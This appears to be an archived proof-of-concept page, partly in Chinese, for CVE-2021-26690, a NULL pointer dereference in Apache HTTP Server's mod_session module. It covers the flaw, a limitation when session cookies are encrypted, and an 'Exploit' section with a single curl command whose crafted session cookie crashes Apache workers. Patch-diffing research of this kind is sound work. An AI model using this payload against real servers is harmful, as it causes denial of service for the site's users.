关联漏洞
标题:
Apache HTTP Server 代码问题漏洞
(CVE-2021-26690)
描述:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 存在代码问题漏洞,该漏洞源于在mod会话中一个NULL指针解引用错误。远程攻击者可利用该漏洞将专门设计的数据传递给应用程序,并执行拒绝服务(DoS)攻击。以下产品及版本受到影响:EasyApache: 4 2017-5-16, 4 2017-6-13, 4 2017-6-21, 4 2017-7-11, 4 2017-
描述
CVE-2021-26690 patch diffing - Apache HTTP mod_session NULL pointer dereference
介绍
# Patch diffing for CVE-2021-26690 - Apache mod_session
This vulnerability is a NULL pointer dereference within the mod_session Apache's module.
It will cause a denial of service for the child processes of Apache's httpd.
By using a repetitive loop, each Apache workers will crash, leading to a denial of service for all clients that connect to or are connected to the website.
This vulnerability was initially discovered by @antonio-morales.
> For the full stages of the process, refer to the PDF in this repository.
# Limitation
If the server implements the SessionCryptoPassphrase option via `mod_session_crypto` the cookie will be encrypted and base64 encoded.
```
<IfModule mod_session.c>
Session On
SessionCookieName session path=/
SessionCryptoPassphrase "YourSecurePassphrase"
SessionMaxAge 1800
</IfModule>
```
In this case, the session cookie pairs cannot be tampered, and the denial of service cannot occur as is.
# Exploit
```bash
curl http://$IP:$PORT/ -v -b 'session=expiry=123456789&='
```
文件快照
[4.0K] /data/pocs/eb2cf52eae62621ae777ef07e4f623f05f4153ab
├── [1.2M] CVE-2021-26690 patch diffing - Apache HTTP mod_session NULL pointer dereference.pdf
└── [1011] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。